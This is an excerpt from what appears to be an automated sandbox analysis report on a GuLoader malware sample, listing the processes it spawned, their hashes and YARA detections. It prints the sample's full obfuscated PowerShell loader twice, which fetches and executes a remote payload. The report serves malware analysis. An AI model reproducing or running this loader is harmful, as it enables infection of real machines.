                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. 
fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. 
skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte 
eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:12:24:02
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:12:24:04
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
                                                      Imagebase:0x7ff60bdf0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:12:24:12
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. 
fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. 
skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte 
eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"
                                                      Imagebase:0xd0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2318228321.0000000005E94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2325090155.0000000008B80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2329721255.000000000CC2B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:12:24:14
                                                      Start date:23/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
                                                      Imagebase:0x240000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:12:24:42
                                                      Start date:23/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                      Imagebase:0x220000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5fd1663f39fe31af0605a2660e5c240326d49b49b9bf061ac414943cce6d9042
                                                        • Instruction ID: 4410f827c2c7f2b4d67ab63bc72c4a432a1302da501c56238881d6f242c26a64
                                                        • Opcode Fuzzy Hash: 5fd1663f39fe31af0605a2660e5c240326d49b49b9bf061ac414943cce6d9042
                                                        • Instruction Fuzzy Hash: 96F19430A0DB8D8FEBA8DF28C8557E977E1FF54310F04426AD85DC72A5DB34A9458B82
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7696951540694d736fa2d4a5974f5718ecbc0e688f5cb317aa4762bf9e3fd509
                                                        • Instruction ID: e96e10a7cc3f9a75a420647f75982c3e62c2f985f1f1dfea78db6eed7aadb733
                                                        • Opcode Fuzzy Hash: 7696951540694d736fa2d4a5974f5718ecbc0e688f5cb317aa4762bf9e3fd509
                                                        • Instruction Fuzzy Hash: 15E1B230A09A4E8FEBA8DF28C8657E977D1EF54310F04436ED85DC72A5DB78A9448B81
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2703810508.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 548349516d5ef3c68c0a33a99cf6c8871b0a4a633b095a2cc9577c7b2a6e8737
                                                        • Instruction ID: 4d236bd0f8e571eb39f3dc15145da546302d6d0ef462cea18fbae37c04e829c9
                                                        • Opcode Fuzzy Hash: 548349516d5ef3c68c0a33a99cf6c8871b0a4a633b095a2cc9577c7b2a6e8737
                                                        • Instruction Fuzzy Hash: B5110A32F0EA9D4FF7A2DBA854A55B87BD1EF59310B1C00BFD44DC71A3DA2558018751
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                        • Instruction ID: 9d0f349b20d3769d702d1b48706392534360580c57a97f4edb4389f87f1da052
                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                        • Instruction Fuzzy Hash: A801447121CB0C4FD748EF0CE451AA5B7E0FB95364F10056EE58AC36A5D626E891CB45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: K_^$K_^$K_^$K_^$K_^$K_^
                                                        • API String ID: 0-3805565700
                                                        • Opcode ID: 3c1d78cb3a0bab75989939032b8bb73e8b341623234552199d6aeb051c2e9062
                                                        • Instruction ID: 2fe1ea36f62f523c2402529b61470373fabaea9d90f0bddd2236adb851087f66
                                                        • Opcode Fuzzy Hash: 3c1d78cb3a0bab75989939032b8bb73e8b341623234552199d6aeb051c2e9062
                                                        • Instruction Fuzzy Hash: BF416672E0E7C75FD7129BA8A8750E43FA0AF5162870A41F7C4988F1B3EE2C29438755
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2702451958.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: K_^$K_^$K_^$K_^$K_^
                                                        • API String ID: 0-3188868157
                                                        • Opcode ID: d3975ea6539968908eb389ef5704f7495d004edcabb3d367685538bcae2daf3f
                                                        • Instruction ID: 0a30aa4a577687ebcee566fefb679379875aeacb0ca660972e35288b5e298b41
                                                        • Opcode Fuzzy Hash: d3975ea6539968908eb389ef5704f7495d004edcabb3d367685538bcae2daf3f
                                                        • Instruction Fuzzy Hash: 1641A853E1F7D60FE7235AA9A8B54E53F90EF12A14B0A02F7C4E45F0B3EE142956C241
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                        • API String ID: 0-2890353280
                                                        • Opcode ID: 2b9e4bc79b9b6a8323997c2c557120502d8e321d938cb5abde4324c7dbde4cb9
                                                        • Instruction ID: 4ca082341de6528529563565802d983f75f4b35d0877fe91c8ce99891c671daf
                                                        • Opcode Fuzzy Hash: 2b9e4bc79b9b6a8323997c2c557120502d8e321d938cb5abde4324c7dbde4cb9
                                                        • Instruction Fuzzy Hash: 4452B3B0A00319CFDB54DF68C850B9ABBB2AF85304F1084AAF5199F355CB75ED85CBA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8N)k$Hbq$h])k$h])k$h])k$$^q$$^q$I)k
                                                        • API String ID: 0-3897658310
                                                        • Opcode ID: d8872d6531439fbfe3d93d795e3856c2dda85e23ab544e4982cb9028307699d6
                                                        • Instruction ID: 01ec248b9d8a43d5eeaed645e07db149a4c52de4b2a78eb430c7b15f935cf399
                                                        • Opcode Fuzzy Hash: d8872d6531439fbfe3d93d795e3856c2dda85e23ab544e4982cb9028307699d6
                                                        • Instruction Fuzzy Hash: 88226134B002188FDB25DB65D9546AEBBF6AF89305F1080E9D40AAB3A1DF35ED45CF81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
